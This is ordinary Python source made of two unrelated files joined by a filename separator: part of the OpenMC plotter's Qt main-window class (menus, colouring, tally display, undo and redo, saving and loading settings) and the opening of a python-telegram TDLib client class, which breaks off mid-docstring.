self.densityAction.setToolTip('Color by density')
self.densityAction.setStatusTip('Color plot by density')
density_connector = partial(self.editColorBy, 'density', apply=True)
self.densityAction.triggered.connect(density_connector)
self.colorbyMenu = self.editMenu.addMenu('&Color By')
self.colorbyMenu.addAction(self.cellAction)
self.colorbyMenu.addAction(self.materialAction)
self.colorbyMenu.addAction(self.temperatureAction)
self.colorbyMenu.addAction(self.densityAction)
self.colorbyMenu.aboutToShow.connect(self.updateColorbyMenu)
self.editMenu.addSeparator()
# Edit -> Other Options
self.maskingAction = QAction('Enable &Masking', self)
self.maskingAction.setShortcut('Ctrl+M')
self.maskingAction.setCheckable(True)
self.maskingAction.setToolTip('Toggle masking')
self.maskingAction.setStatusTip('Toggle whether masking is enabled')
masking_connector = partial(self.toggleMasking, apply=True)
self.maskingAction.toggled.connect(masking_connector)
self.editMenu.addAction(self.maskingAction)
self.highlightingAct = QAction('Enable High&lighting', self)
self.highlightingAct.setShortcut('Ctrl+L')
self.highlightingAct.setCheckable(True)
self.highlightingAct.setToolTip('Toggle highlighting')
self.highlightingAct.setStatusTip('Toggle whether '
'highlighting is enabled')
highlight_connector = partial(self.toggleHighlighting, apply=True)
self.highlightingAct.toggled.connect(highlight_connector)
self.editMenu.addAction(self.highlightingAct)
self.overlapAct = QAction('Enable Overlap Coloring', self)
self.overlapAct.setShortcut('Ctrl+P')
self.overlapAct.setCheckable(True)
self.overlapAct.setToolTip('Toggle overlapping regions')
self.overlapAct.setStatusTip('Toggle display of overlapping '
'regions when enabled')
overlap_connector = partial(self.toggleOverlaps, apply=True)
self.overlapAct.toggled.connect(overlap_connector)
self.editMenu.addAction(self.overlapAct)
self.outlineAct = QAction('Enable Domain Outlines', self)
self.outlineAct.setShortcut('Ctrl+U')
self.outlineAct.setCheckable(True)
self.outlineAct.setToolTip('Display Cell/Material Boundaries')
self.outlineAct.setStatusTip('Toggle display of domain '
'outlines when enabled')
outline_connector = partial(self.toggleOutlines, apply=True)
self.outlineAct.toggled.connect(outline_connector)
self.editMenu.addAction(self.outlineAct)
# View Menu
self.dockAction = QAction('Hide &Dock', self)
self.dockAction.setShortcut("Ctrl+D")
self.dockAction.setToolTip('Toggle dock visibility')
self.dockAction.setStatusTip('Toggle dock visibility')
self.dockAction.triggered.connect(self.toggleDockView)
self.tallyDockAction = QAction('Tally &Dock', self)
self.tallyDockAction.setShortcut("Ctrl+T")
self.tallyDockAction.setToolTip('Toggle tally dock visibility')
self.tallyDockAction.setStatusTip('Toggle tally dock visibility')
self.tallyDockAction.triggered.connect(self.toggleTallyDockView)
self.zoomAction = QAction('&Zoom...', self)
self.zoomAction.setShortcut('Alt+Shift+Z')
self.zoomAction.setToolTip('Edit zoom factor')
self.zoomAction.setStatusTip('Edit zoom factor')
self.zoomAction.triggered.connect(self.editZoomAct)
self.viewMenu = self.mainMenu.addMenu('&View')
self.viewMenu.addAction(self.dockAction)
self.viewMenu.addAction(self.tallyDockAction)
self.viewMenu.addSeparator()
self.viewMenu.addAction(self.zoomAction)
self.viewMenu.aboutToShow.connect(self.updateViewMenu)
# Window Menu
self.mainWindowAction = QAction('&Main Window', self)
self.mainWindowAction.setCheckable(True)
self.mainWindowAction.setToolTip('Bring main window to front')
self.mainWindowAction.setStatusTip('Bring main window to front')
self.mainWindowAction.triggered.connect(self.showMainWindow)
self.colorDialogAction = QAction('Color &Options', self)
self.colorDialogAction.setCheckable(True)
self.colorDialogAction.setToolTip('Bring Color Dialog to front')
self.colorDialogAction.setStatusTip('Bring Color Dialog to front')
self.colorDialogAction.triggered.connect(self.showColorDialog)
# Keyboard Shortcuts Overlay
self.keyboardShortcutsAction = QAction("&Keyboard Shortcuts...", self)
self.keyboardShortcutsAction.setShortcut("?")
self.keyboardShortcutsAction.setToolTip("Display Keyboard Shortcuts")
self.keyboardShortcutsAction.setStatusTip("Display Keyboard Shortcuts")
self.keyboardShortcutsAction.triggered.connect(self.toggleShortcuts)
self.windowMenu = self.mainMenu.addMenu('&Window')
self.windowMenu.addAction(self.mainWindowAction)
self.windowMenu.addAction(self.colorDialogAction)
self.windowMenu.addAction(self.keyboardShortcutsAction)
self.windowMenu.aboutToShow.connect(self.updateWindowMenu)
def updateEditMenu(self):
changed = self.model.currentView != self.model.defaultView
self.restoreAction.setDisabled(not changed)
self.maskingAction.setChecked(self.model.currentView.masking)
self.highlightingAct.setChecked(self.model.currentView.highlighting)
self.outlineAct.setChecked(self.model.currentView.outlines)
num_previous_views = len(self.model.previousViews)
self.undoAction.setText('&Undo ({})'.format(num_previous_views))
num_subsequent_views = len(self.model.subsequentViews)
self.redoAction.setText('&Redo ({})'.format(num_subsequent_views))
def updateBasisMenu(self):
self.xyAction.setChecked(self.model.currentView.basis == 'xy')
self.xzAction.setChecked(self.model.currentView.basis == 'xz')
self.yzAction.setChecked(self.model.currentView.basis == 'yz')
def updateColorbyMenu(self):
cv = self.model.currentView
self.cellAction.setChecked(cv.colorby == 'cell')
self.materialAction.setChecked(cv.colorby == 'material')
self.temperatureAction.setChecked(cv.colorby == 'temperature')
self.densityAction.setChecked(cv.colorby == 'density')
def updateViewMenu(self):
if self.dock.isVisible():
self.dockAction.setText('Hide &Dock')
else:
self.dockAction.setText('Show &Dock')
def updateWindowMenu(self):
self.colorDialogAction.setChecked(self.colorDialog.isActiveWindow())
self.mainWindowAction.setChecked(self.isActiveWindow())
# Menu and shared methods
def loadModel(self, reload=False):
if reload:
self.resetModels()
else:
# create new plot model
self.model = PlotModel()
self.restoreModelSettings()
# update plot and model settings
self.updateRelativeBases()
self.cellsModel = DomainTableModel(self.model.activeView.cells)
self.materialsModel = DomainTableModel(self.model.activeView.materials)
if reload:
loader_thread = Thread(target=_openmcReload)
loader_thread.start()
while loader_thread.is_alive():
self.statusBar().showMessage("Reloading model...")
QApplication.processEvents()
self.plotIm.model = self.model
self.applyChanges()
def saveImage(self):
filename, ext = QFileDialog.getSaveFileName(self,
"Save Plot Image",
"untitled",
"Images (*.png)")
if filename:
if "." not in filename:
filename += ".png"
self.plotIm.figure.savefig(filename, transparent=True)
self.statusBar().showMessage('Plot Image Saved', 5000)
def saveView(self):
filename, ext = QFileDialog.getSaveFileName(self,
"Save View Settings",
"untitled",
"View Settings (*.pltvw)")
if filename:
if "." not in filename:
filename += ".pltvw"
saved = {'version': self.model.version,
'current': self.model.currentView}
with open(filename, 'wb') as file:
pickle.dump(saved, file)
def openView(self):
filename, ext = QFileDialog.getOpenFileName(self, "Open View Settings",
".", "*.pltvw")
if filename:
try:
with open(filename, 'rb') as file:
saved = pickle.load(file)
except Exception:
message = 'Error loading plot settings'
saved = {'version': None,
'current': None}
if saved['version'] == self.model.version:
self.model.activeView = saved['current']
self.dock.updateDock()
self.colorDialog.updateDialogValues()
self.applyChanges()
message = '{} settings loaded'.format(filename)
else:
message = 'Error loading plot settings. Incompatible model.'
self.statusBar().showMessage(message, 5000)
def openStatePoint(self):
# check for an alread-open statepoint
if self.model.statepoint:
msg_box = QMessageBox()
msg_box.setText("Please close the current statepoint file before "
"opening a new one.")
msg_box.setIcon(QMessageBox.Information)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
return
filename, ext = QFileDialog.getOpenFileName(self, "Open StatePoint",
".", "statepoint*.h5")
if filename:
try:
self.model.openStatePoint(filename)
message = 'Opened statepoint file: {}'
except (FileNotFoundError, OSError):
message = 'Error opening statepoint file: {}'
msg_box = QMessageBox()
msg = "Could not open statepoint file: \n\n {} \n"
msg_box.setText(msg.format(filename))
msg_box.setIcon(QMessageBox.Warning)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
finally:
self.statusBar().showMessage(message.format(filename), 5000)
self.updateDataMenu()
self.tallyDock.update()
def importProperties(self):
filename, ext = QFileDialog.getOpenFileName(self, "Import properties",
".", "*.h5")
if not filename:
return
try:
openmc.lib.import_properties(filename)
message = 'Imported properties: {}'
except (FileNotFoundError, OSError, openmc.lib.exc.OpenMCError) as e:
message = 'Error opening properties file: {}'
msg_box = QMessageBox()
msg_box.setText(f"Error opening properties file: \n\n {e} \n")
msg_box.setIcon(QMessageBox.Warning)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
finally:
self.statusBar().showMessage(message.format(filename), 5000)
if self.model.activeView.colorby == 'temperature':
self.applyChanges()
def closeStatePoint(self):
# remove the statepoint object and update the data menu
filename = self.model.statepoint.filename
self.model.statepoint = None
self.model.currentView.selectedTally = None
self.model.activeView.selectedTally = None
msg = "Closed statepoint file {}".format(filename)
self.statusBar().showMessage(msg)
self.updateDataMenu()
self.tallyDock.selectTally()
self.tallyDock.update()
self.plotIm.updatePixmap()
def updateDataMenu(self):
if self.model.statepoint:
self.closeStatePointAction = QAction("&Close statepoint", self)
self.closeStatePointAction.setToolTip("Close current statepoint")
self.closeStatePointAction.triggered.connect(self.closeStatePoint)
self.dataMenu.addAction(self.closeStatePointAction)
elif hasattr(self, "closeStatePointAction"):
self.dataMenu.removeAction(self.closeStatePointAction)
def applyChanges(self):
if self.model.activeView != self.model.currentView:
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.storeCurrent()
self.model.subsequentViews = []
self.plotIm.generatePixmap()
self.resetModels()
self.showCurrentView()
self.statusBar().showMessage('')
else:
self.statusBar().showMessage('No changes to apply.', 3000)
def undo(self):
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.undo()
self.resetModels()
self.showCurrentView()
self.dock.updateDock()
self.colorDialog.updateDialogValues()
if not self.model.previousViews:
self.undoAction.setDisabled(True)
self.redoAction.setDisabled(False)
self.statusBar().showMessage('')
def redo(self):
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.redo()
self.resetModels()
self.showCurrentView()
self.dock.updateDock()
self.colorDialog.updateDialogValues()
if not self.model.subsequentViews:
self.redoAction.setDisabled(True)
self.undoAction.setDisabled(False)
self.statusBar().showMessage('')
def restoreDefault(self):
if self.model.currentView != self.model.defaultView:
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.storeCurrent()
self.model.activeView.adopt_plotbase(self.model.defaultView)
self.plotIm.generatePixmap()
self.resetModels()
self.showCurrentView()
self.dock.updateDock()
self.colorDialog.updateDialogValues()
self.model.subsequentViews = []
self.statusBar().showMessage('')
def editBasis(self, basis, apply=False):
self.model.activeView.basis = basis
self.dock.updateBasis()
if apply:
self.applyChanges()
def editColorBy(self, domain_kind, apply=False):
self.model.activeView.colorby = domain_kind
self.dock.updateColorBy()
self.colorDialog.updateColorBy()
if apply:
self.applyChanges()
def editUniverseLevel(self, level, apply=False):
if level in ('all', ''):
self.model.activeView.level = -1
else:
self.model.activeView.level = int(level)
self.dock.updateUniverseLevel()
self.colorDialog.updateUniverseLevel()
if apply:
self.applyChanges()
def toggleOverlaps(self, state, apply=False):
self.model.activeView.color_overlaps = bool(state)
self.colorDialog.updateOverlap()
if apply:
self.applyChanges()
def editColorMap(self, colormap_name, property_type, apply=False):
self.model.activeView.colormaps[property_type] = colormap_name
self.plotIm.updateColorMap(colormap_name, property_type)
self.colorDialog.updateColorMaps()
if apply:
self.applyChanges()
def editColorbarMin(self, min_val, property_type, apply=False):
av = self.model.activeView
current = av.user_minmax[property_type]
av.user_minmax[property_type] = (min_val, current[1])
self.colorDialog.updateColorMinMax()
self.plotIm.updateColorMinMax(property_type)
if apply:
self.applyChanges()
def editColorbarMax(self, max_val, property_type, apply=False):
av = self.model.activeView
current = av.user_minmax[property_type]
av.user_minmax[property_type] = (current[0], max_val)
self.colorDialog.updateColorMinMax()
self.plotIm.updateColorMinMax(property_type)
if apply:
self.applyChanges()
def toggleColorbarScale(self, state, property, apply=False):
av = self.model.activeView
av.color_scale_log[property] = bool(state)
# temporary, should be resolved diferently in the future
cv = self.model.currentView
cv.color_scale_log[property] = bool(state)
self.plotIm.updateColorbarScale()
if apply:
self.applyChanges()
def toggleUserMinMax(self, state, property):
av = self.model.activeView
av.use_custom_minmax[property] = bool(state)
if av.user_minmax[property] == (0.0, 0.0):
av.user_minmax[property] = copy.copy(av.data_minmax[property])
self.plotIm.updateColorMinMax('temperature')
self.plotIm.updateColorMinMax('density')
self.colorDialog.updateColorMinMax()
def toggleDataIndicatorCheckBox(self, state, property, apply=False):
av = self.model.activeView
av.data_indicator_enabled[property] = bool(state)
cv = self.model.currentView
cv.data_indicator_enabled[property] = bool(state)
self.plotIm.updateDataIndicatorVisibility()
if apply:
self.applyChanges()
def toggleMasking(self, state, apply=False):
self.model.activeView.masking = bool(state)
self.colorDialog.updateMasking()
if apply:
self.applyChanges()
def toggleHighlighting(self, state, apply=False):
self.model.activeView.highlighting = bool(state)
self.colorDialog.updateHighlighting()
if apply:
self.applyChanges()
def toggleDockView(self):
if self.dock.isVisible():
self.dock.hide()
if not self.isMaximized() and not self.dock.isFloating():
self.resize(self.width() - self.dock.width(), self.height())
else:
self.dock.setVisible(True)
if not self.isMaximized() and not self.dock.isFloating():
self.resize(self.width() + self.dock.width(), self.height())
self.resizePixmap()
self.showMainWindow()
def toggleTallyDockView(self):
if self.tallyDock.isVisible():
self.tallyDock.hide()
if not self.isMaximized() and not self.tallyDock.isFloating():
self.resize(self.width() - self.tallyDock.width(), self.height())
else:
self.tallyDock.setVisible(True)
if not self.isMaximized() and not self.tallyDock.isFloating():
self.resize(self.width() + self.tallyDock.width(), self.height())
self.resizePixmap()
self.showMainWindow()
def editZoomAct(self):
percent, ok = QInputDialog.getInt(self, "Edit Zoom", "Zoom Percent:",
self.dock.zoomBox.value(), 25, 2000)
if ok:
self.dock.zoomBox.setValue(percent)
def editZoom(self, value):
self.zoom = value
self.resizePixmap()
self.dock.zoomBox.setValue(value)
def showMainWindow(self):
self.raise_()
self.activateWindow()
def showColorDialog(self):
self.colorDialog.show()
self.colorDialog.raise_()
self.colorDialog.activateWindow()
def showExportDialog(self):
self.exportDataDialog.show()
self.exportDataDialog.raise_()
self.exportDataDialog.activateWindow()
# Dock methods:
def editSingleOrigin(self, value, dimension):
self.model.activeView.origin[dimension] = value
def editPlotAlpha(self, value):
self.model.activeView.domainAlpha = value
def editPlotVisibility(self, value):
self.model.activeView.domainVisible = bool(value)
def toggleOutlines(self, value, apply=False):
self.model.activeView.outlines = bool(value)
self.dock.updateOutlines()
if apply:
self.applyChanges()
def editWidth(self, value):
self.model.activeView.width = value
self.onRatioChange()
self.dock.updateWidth()
def editHeight(self, value):
self.model.activeView.height = value
self.onRatioChange()
self.dock.updateHeight()
def toggleAspectLock(self, state):
self.model.activeView.aspectLock = bool(state)
self.onRatioChange()
self.dock.updateAspectLock()
def editVRes(self, value):
self.model.activeView.v_res = value
self.dock.updateVRes()
def editHRes(self, value):
self.model.activeView.h_res = value
self.onRatioChange()
self.dock.updateHRes()
# Color dialog methods:
def editMaskingColor(self):
current_color = self.model.activeView.maskBackground
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.maskBackground = new_color
self.colorDialog.updateMaskingColor()
def editHighlightColor(self):
current_color = self.model.activeView.highlightBackground
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.highlightBackground = new_color
self.colorDialog.updateHighlightColor()
def editAlpha(self, value):
self.model.activeView.highlightAlpha = value
def editSeed(self, value):
self.model.activeView.highlightSeed = value
def editOverlapColor(self, apply=False):
current_color = self.model.activeView.overlap_color
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.overlap_color = new_color
self.colorDialog.updateOverlapColor()
if apply:
self.applyChanges()
def editBackgroundColor(self, apply=False):
current_color = self.model.activeView.domainBackground
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.domainBackground = new_color
self.colorDialog.updateBackgroundColor()
if apply:
self.applyChanges()
def resetColors(self):
self.model.resetColors()
self.colorDialog.updateDialogValues()
self.applyChanges()
# Tally dock methods
def editSelectedTally(self, event):
av = self.model.activeView
if event is None or event == "None" or event == "":
av.selectedTally = None
else:
av.selectedTally = int(event.split()[1])
self.tallyDock.selectTally(event)
def editTallyValue(self, event):
av = self.model.activeView
av.tallyValue = event
def updateScores(self, state):
self.tallyDock.updateScores()
def updateNuclides(self, state):
self.tallyDock.updateNuclides()
def toggleTallyVisibility(self, state, apply=False):
av = self.model.activeView
av.tallyDataVisible = bool(state)
if apply:
self.applyChanges()
def toggleTallyLogScale(self, state, apply=False):
av = self.model.activeView
av.tallyDataLogScale = bool(state)
if apply:
self.applyChanges()
def toggleTallyMaskZero(self, state):
av = self.model.activeView
av.tallyMaskZeroValues = bool(state)
def editTallyAlpha(self, value, apply=False):
av = self.model.activeView
av.tallyDataAlpha = value
if apply:
self.applyChanges()
def toggleTallyContours(self, state):
av = self.model.activeView
av.tallyContours = bool(state)
def editTallyContourLevels(self, value):
av = self.model.activeView
av.tallyContourLevels = value
def toggleTallyDataIndicator(self, state, apply=False):
av = self.model.activeView
av.tallyDataIndicator = bool(state)
if apply:
self.applyChanges()
def toggleTallyDataClip(self, state):
av = self.model.activeView
av.clipTallyData = bool(state)
def toggleTallyDataUserMinMax(self, state, apply=False):
av = self.model.activeView
av.tallyDataUserMinMax = bool(state)
self.tallyDock.tallyColorForm.setMinMaxEnabled(bool(state))
if apply:
self.applyChanges()
def editTallyDataMin(self, value, apply=False):
av = self.model.activeView
av.tallyDataMin = value
if apply:
self.applyChanges()
def editTallyDataMax(self, value, apply=False):
av = self.model.activeView
av.tallyDataMax = value
if apply:
self.applyChanges()
def editTallyDataColormap(self, cmap, apply=False):
av = self.model.activeView
av.tallyDataColormap = cmap
if apply:
self.applyChanges()
def updateTallyMinMax(self):
self.tallyDock.updateMinMax()
# Plot image methods
def editPlotOrigin(self, xOr, yOr, zOr=None, apply=False):
if zOr is not None:
self.model.activeView.origin = [xOr, yOr, zOr]
else:
origin = [None, None, None]
origin[self.xBasis] = xOr
origin[self.yBasis] = yOr
origin[self.zBasis] = self.model.activeView.origin[self.zBasis]
self.model.activeView.origin = origin
self.dock.updateOrigin()
if apply:
self.applyChanges()
def revertDockControls(self):
self.dock.revertToCurrent()
def editDomainColor(self, kind, id):
if kind == 'Cell':
domain = self.model.activeView.cells
else:
domain = self.model.activeView.materials
current_color = domain[id].color
dlg = QColorDialog(self)
if isinstance(current_color, tuple):
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
elif isinstance(current_color, str):
current_color = openmc.plots._SVG_COLORS[current_color]
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
domain[id].color = new_color
self.applyChanges()
def toggleDomainMask(self, state, kind, id):
if kind == 'Cell':
domain = self.model.activeView.cells
else:
domain = self.model.activeView.materials
domain[id].masked = bool(state)
self.applyChanges()
def toggleDomainHighlight(self, state, kind, id):
if kind == 'Cell':
domain = self.model.activeView.cells
else:
domain = self.model.activeView.materials
domain[id].highlight = bool(state)
self.applyChanges()
# Helper methods:
def restoreWindowSettings(self):
settings = QtCore.QSettings()
self.resize(settings.value("mainWindow/Size",
QtCore.QSize(800, 600)))
self.move(settings.value("mainWindow/Position",
QtCore.QPoint(100, 100)))
self.restoreState(settings.value("mainWindow/State"))
self.colorDialog.resize(settings.value("colorDialog/Size",
QtCore.QSize(400, 500)))
self.colorDialog.move(settings.value("colorDialog/Position",
QtCore.QPoint(600, 200)))
is_visible = settings.value("colorDialog/Visible", 0)
# some versions of PySide will return None rather than the default value
if is_visible is None:
is_visible = False
else:
is_visible = bool(int(is_visible))
self.colorDialog.setVisible(is_visible)
def restoreModelSettings(self):
if os.path.isfile("plot_settings.pkl"):
with open('plot_settings.pkl', 'rb') as file:
model = pickle.load(file)
# do not replace model if the version is out of date
if model.version != self.model.version:
print("WARNING: previous plot settings are for a different "
"version of the GUI. They will be ignored.")
wrn_msg = "Existing version: {}, Current GUI version: {}"
print(wrn_msg.format(model.version, self.model.version))
return
try:
self.model.statepoint = model.statepoint
except OSError:
msg_box = QMessageBox()
msg = "Could not open statepoint file: \n\n {} \n"
msg_box.setText(msg.format(self.model.statepoint.filename))
msg_box.setIcon(QMessageBox.Warning)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
self.model.statepoint = None
self.model.currentView = model.currentView
self.model.activeView = copy.deepcopy(model.currentView)
self.model.previousViews = model.previousViews
self.model.subsequentViews = model.subsequentViews
def resetModels(self):
self.cellsModel = DomainTableModel(self.model.activeView.cells)
self.materialsModel = DomainTableModel(self.model.activeView.materials)
self.cellsModel.beginResetModel()
self.cellsModel.endResetModel()
self.materialsModel.beginResetModel()
self.materialsModel.endResetModel()
self.colorDialog.updateDomainTabs()
def showCurrentView(self):
self.updateScale()
self.updateRelativeBases()
self.plotIm.updatePixmap()
if self.model.previousViews:
self.undoAction.setDisabled(False)
if self.model.subsequentViews:
self.redoAction.setDisabled(False)
else:
self.redoAction.setDisabled(True)
self.adjustWindow()
def updateScale(self):
cv = self.model.currentView
self.scale = (cv.h_res / cv.width,
cv.v_res / cv.height)
def updateRelativeBases(self):
cv = self.model.currentView
self.xBasis = 0 if cv.basis[0] == 'x' else 1
self.yBasis = 1 if cv.basis[1] == 'y' else 2
self.zBasis = 3 - (self.xBasis + self.yBasis)
def adjustWindow(self):
self.setMaximumSize(self.screen.width(), self.screen.height())
def onRatioChange(self):
av = self.model.activeView
if av.aspectLock:
ratio = av.width / max(av.height, .001)
av.v_res = int(av.h_res / ratio)
self.dock.updateVRes()
def showCoords(self, xPlotPos, yPlotPos):
cv = self.model.currentView
if cv.basis == 'xy':
coords = ("({}, {}, {})".format(round(xPlotPos, 2),
round(yPlotPos, 2),
round(cv.origin[2], 2)))
elif cv.basis == 'xz':
coords = ("({}, {}, {})".format(round(xPlotPos, 2),
round(cv.origin[1], 2),
round(yPlotPos, 2)))
else:
coords = ("({}, {}, {})".format(round(cv.origin[0], 2),
round(xPlotPos, 2),
round(yPlotPos, 2)))
self.coord_label.setText('{}'.format(coords))
def resizePixmap(self):
self.plotIm._resize()
self.plotIm.adjustSize()
def moveEvent(self, event):
self.adjustWindow()
def resizeEvent(self, event):
self.plotIm._resize()
self.adjustWindow()
self.updateScale()
if self.shortcutOverlay.isVisible():
self.shortcutOverlay.resize(self.width(), self.height())
def closeEvent(self, event):
settings = QtCore.QSettings()
settings.setValue("mainWindow/Size", self.size())
settings.setValue("mainWindow/Position", self.pos())
settings.setValue("mainWindow/State", self.saveState())
settings.setValue("colorDialog/Size", self.colorDialog.size())
settings.setValue("colorDialog/Position", self.colorDialog.pos())
visible = int(self.colorDialog.isVisible())
settings.setValue("colorDialog/Visible", visible)
openmc.lib.finalize()
self.saveSettings()
def saveSettings(self):
if len(self.model.previousViews) > 10:
self.model.previousViews = self.model.previousViews[-10:]
if len(self.model.subsequentViews) > 10:
self.model.subsequentViews = self.model.subsequentViews[-10:]
with open('plot_settings.pkl', 'wb') as file:
if self.model.statepoint:
self.model.statepoint.close()
pickle.dump(self.model, file)
def exportTallyData(self):
# show export tool dialog
self.showExportDialog()
|
client.py
|
import os
import hashlib
import time
import queue
import signal
import typing
import getpass
import logging
import base64
import threading
from typing import (
Any,
Dict,
List,
Type,
Callable,
Optional,
DefaultDict,
Union,
Tuple,
)
from types import FrameType
from collections import defaultdict
import enum
from telegram import VERSION
from telegram.utils import AsyncResult
from telegram.tdjson import TDJson
from telegram.worker import BaseWorker, SimpleWorker
logger = logging.getLogger(__name__)
MESSAGE_HANDLER_TYPE: str = 'updateNewMessage'
class AuthorizationState(enum.Enum):
NONE = None
WAIT_CODE = 'authorizationStateWaitCode'
WAIT_PASSWORD = 'authorizationStateWaitPassword'
WAIT_TDLIB_PARAMETERS = 'authorizationStateWaitTdlibParameters'
WAIT_ENCRYPTION_KEY = 'authorizationStateWaitEncryptionKey'
WAIT_PHONE_NUMBER = 'authorizationStateWaitPhoneNumber'
READY = 'authorizationStateReady'
CLOSING = 'authorizationStateClosing'
CLOSED = 'authorizationStateClosed'
class Telegram:
def __init__(
self,
api_id: int,
api_hash: str,
database_encryption_key: Union[str, bytes],
phone: Optional[str] = None,
bot_token: Optional[str] = None,
library_path: Optional[str] = None,
worker: Optional[Type[BaseWorker]] = None,
files_directory: Optional[str] = None,
use_test_dc: bool = False,
use_message_database: bool = True,
device_model: str = 'python-telegram',
application_version: str = VERSION,
system_version: str = 'unknown',
system_language_code: str = 'en',
login: bool = False,
default_workers_queue_size: int = 1000,
tdlib_verbosity: int = 2,
proxy_server: str = '',
proxy_port: int = 0,
proxy_type: Optional[Dict[str, str]] = None,
use_secret_chats: bool = True,
) -> None:
"""
Args:
api_id - ID of your app (https://my.telegram.org/apps/)
api_hash - api_hash of your app (https://my.telegram.org/apps/)
phone - your phone number
library_path - you can change path to the compiled libtdjson library
worker - worker to process updates
files_directory - directory for the tdlib's files (database, images, etc.)
use_test_dc - use test datacenter
use_message_database
use_secret_chats
device_model
application_version
system_version
system_language_code
"""
self.api_id = api_id
self.api_hash = api_hash
self.library_path = library_path
self.phone = phone
self.bot_token = bot_token
self.use_test_dc = use_test_dc
self.device_model = device_model
self.system_version = system_version
self.system_language_code = system_language_code
self.application_version = application_version
self.use_message_database = use_message_database
self._queue_put_timeout = 10
self.proxy_server = proxy_server
self.proxy_port = proxy_port
self.proxy_type = proxy_type
self.use_secret_chats = use_secret_chats
self.authorization_state = AuthorizationState.NONE
if not self.bot_token and not self.phone:
raise ValueError('You must provide bot_token or phone')
self._database_encryption_key = database_encryption_key
if not files_directory:
hasher = hashlib.md5()
str_to_encode: str = self.phone or self.bot_token # type: ignore
hasher.update(str_to_encode.encode('utf-8'))
directory_name = hasher.hexdigest()
files_directory = f'/tmp/.tdlib_files/{directory_name}/'
self.files_directory = files_directory
self._authorized = False
self._stopped = threading.Event()
# todo: move to worker
self._workers_queue: queue.Queue = queue.Queue(maxsize=default_workers_queue_size)
if not worker:
worker = SimpleWorker
self.worker: BaseWorker = worker(queue=self._workers_queue)
self._results: Dict[str, AsyncResult] = {}
self._update_handlers: DefaultDict[str, List[Callable]] = defaultdict(list)
self._tdjson = TDJson(library_path=library_path, verbosity=tdlib_verbosity)
self._run()
if login:
self.login()
def stop(self) -> None:
"""Stops the client"""
if self._stopped.is_set():
return
logger.info('Stopping telegram client...')
self._close()
self.worker.stop()
self._stopped.set()
# wait for the tdjson listener to stop
self._td_listener.join()
if hasattr(self, '_tdjson'):
self._tdjson.stop()
def _close(self) -> None:
"""
Calls `close` tdlib method and waits until authorization_state becomes CLOSED.
Blocking.
"""
self.call_method('close')
while self.authorization_state != AuthorizationState.CLOSED:
result = self.get_authorization_state()
self.authorization_state = self._wait_authorization_result(result)
logger.info('Authorization state: %s', self.authorization_state)
time.sleep(0.5)
def send_message(self, chat_id: int, text: str) -> AsyncResult:
"""
Sends a message to a chat. The chat must be in the tdlib's database.
If there is no chat in the DB, tdlib returns an error.
Chat is being saved to the database when the client receives a message or when you call the `get_chats` method.
Args:
chat_id
text
Returns:
AsyncResult
The update will be:
{
'@type': 'message',
'id': 1,
'sender_user_id': 2,
'chat_id': 3,
...
}
"""
data = {
'@type': 'sendMessage',
'chat_id': chat_id,
'input_message_content': {
'@type': 'inputMessageText',
'text': {'@type': 'formattedText', 'text': text},
},
}
return self._send_data(data)
def get_chat(self, chat_id: int) -> AsyncResult:
"""
This is offline request, if there is no chat in your database it will not be found
tdlib saves chat to the database when it receives a new message or when you call `get_chats` method.
"""
data = {'@type': 'getChat', 'chat_id': chat_id}
return self._send_data(data)
def get_me(self) -> AsyncResult:
"""
Requests information of the current user (getMe method)
https://core.telegram.org/tdlib/docs/classtd_1_1td__api_1_1get_me.html
"""
return self.call_method('getMe')
def get_user(self, user_id: int) -> AsyncResult:
"""
Requests information about a user with id = user_id.
https://core.telegram.org/tdlib/docs/classtd_1_1td__api_1_1get_user.html
"""
return self.call_method('getUser', params={'user_id': user_id})
def get_chats(self, offset_order: int = 0, offset_chat_id: int = 0, limit: int = 100) -> AsyncResult:
"""
Returns a list of chats:
Returns:
{
'@type': 'chats',
'chat_ids': [...],
'@extra': {
'request_id': '...'
}
}
"""
data = {
'@type': 'getChats',
'offset_order': offset_order,
'offset_chat_id': offset_chat_id,
'limit': limit,
}
return self._send_data(data)
def get_chat_history(
self,
chat_id: int,
limit: int = 1000,
from_message_id: int = 0,
offset: int = 0,
only_local: bool = False,
) -> AsyncResult:
"""
Returns history of a chat
Args:
chat_id
limit
from_message_id
offset
only_local
"""
data = {
'@type': 'getChatHistory',
'chat_id': chat_id,
'limit': limit,
'from_message_id': from_message_id,
'offset': offset,
'only_local': only_local,
}
return self._send_data(data)
def get_message(
self,
chat_id: int,
message_id: int,
) -> AsyncResult:
"""
Return a message via its message_id
Args:
chat_id
message_id
Returns:
AsyncResult
The update will be:
{
'@type': 'message',
'id': 1,
'sender_user_id': 2,
'chat_id': 3,
'content': {...},
...
}
"""
data = {
'@type': 'getMessage',
'chat_id': chat_id,
'message_id': message_id,
}
return self._send_data(data)
def delete_messages(self, chat_id: int, message_ids: List[int], revoke: bool = True) -> AsyncResult:
"""
Delete a list of messages in a chat
Args:
chat_id
message_ids
revoke
"""
return self._send_data(
{
'@type': 'deleteMessages',
'chat_id': chat_id,
'message_ids': message_ids,
'revoke': revoke,
}
)
def get_supergroup_full_info(self, supergroup_id: int) -> AsyncResult:
"""
Get the full info of a supergroup
Args:
